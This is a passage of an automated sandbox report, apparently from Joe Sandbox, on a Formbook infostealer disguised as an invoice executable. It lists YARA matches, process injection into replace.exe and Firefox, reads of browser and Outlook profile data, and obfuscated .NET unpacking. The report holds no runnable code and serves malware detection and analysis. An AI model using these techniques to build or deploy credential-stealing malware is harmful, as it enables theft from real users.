Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03737D73 5_2_03737D73
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03683D40 5_2_03683D40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03731D5A 5_2_03731D5A
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0368AD00 5_2_0368AD00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0367ADE0 5_2_0367ADE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0369FDC0 5_2_0369FDC0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03698DBF 5_2_03698DBF
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036F9C32 5_2_036F9C32
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03680C00 5_2_03680C00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0373FCF2 5_2_0373FCF2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03670CF2 5_2_03670CF2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_03720CB5 5_2_03720CB5
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E116D0 5_2_00E116D0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E2A1E0 5_2_00E2A1E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1322B 5_2_00E1322B
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E13230 5_2_00E13230
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E0C887 5_2_00E0C887
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E0C890 5_2_00E0C890
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E0CAB0 5_2_00E0CAB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E0AB30 5_2_00E0AB30
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: String function: 01035130 appears 57 times
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: String function: 00FEB970 appears 257 times
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: String function: 0106EA12 appears 86 times
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: String function: 0107F290 appears 103 times
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: String function: 01047E54 appears 97 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 0366B970 appears 250 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 036C7E54 appears 88 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 036FF290 appears 103 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 036EEA12 appears 86 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 036B5130 appears 36 times
PE / OLE file has an invalid certificate
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1634176335.0000000006650000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.00000000032F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1633542425.0000000005B10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1630781285.000000000137E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.000000000334A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1632421765.00000000044CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.00000000010ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs HYCO_Invoices MS2 & MS3.exe
Source: HYCO_Invoices MS2 & MS3.exe Binary or memory string: OriginalFilenametHve.exe4 vs HYCO_Invoices MS2 & MS3.exe
Uses 32bit PE files
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.SetAccessControl
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.AddAccessRule
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, SSYGWfDca6ipkM6C75.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, SSYGWfDca6ipkM6C75.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.SetAccessControl
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.AddAccessRule
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.SetAccessControl
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs Security API names: _0020.AddAccessRule
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, SSYGWfDca6ipkM6C75.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@7/6
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HYCO_Invoices MS2 & MS3.exe.log Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\replace.exe File created: C:\Users\user\AppData\Local\Temp\C3vB7APK Jump to behavior
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HYCO_Invoices MS2 & MS3.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: replace.exe, 00000005.00000003.2088920007.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2889773857.00000000030F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: HYCO_Invoices MS2 & MS3.exe ReversingLabs: Detection: 47%
Source: HYCO_Invoices MS2 & MS3.exe Virustotal: Detection: 40%
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe File read: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe" Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.cs .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.335a064.3.raw.unpack, LoginForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.3319bb4.8.raw.unpack, LoginForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.cs .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.5b10000.12.raw.unpack, LoginForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.cs .Net Code: InpNnDxIhT System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00416023 push ds; ret 2_2_00416071
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00404834 push ebx; ret 2_2_00404835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040A036 push es; ret 2_2_0040A039
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_004119A0 pushfd ; iretd 2_2_004119B2
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00409A42 push ecx; ret 2_2_00409A46
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040D276 push ebx; retf 2_2_0040D29A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040D214 push ecx; iretd 2_2_0040D215
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00418B17 push ss; retf 2_2_00418B1B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_004074E7 pushad ; iretd 2_2_004074F3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00403490 push eax; ret 2_2_00403492
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00409D5A push cs; retf 2_2_00409D5B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00406524 push es; iretd 2_2_00406530
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_004145D8 pushfd ; ret 2_2_004145D9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0040CE54 push cs; iretd 2_2_0040CE5B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF09AD push ecx; mov dword ptr [esp], ecx 2_2_00FF09B6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_036709AD push ecx; mov dword ptr [esp], ecx 5_2_036709B6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E03091 push es; iretd 5_2_00E0309D
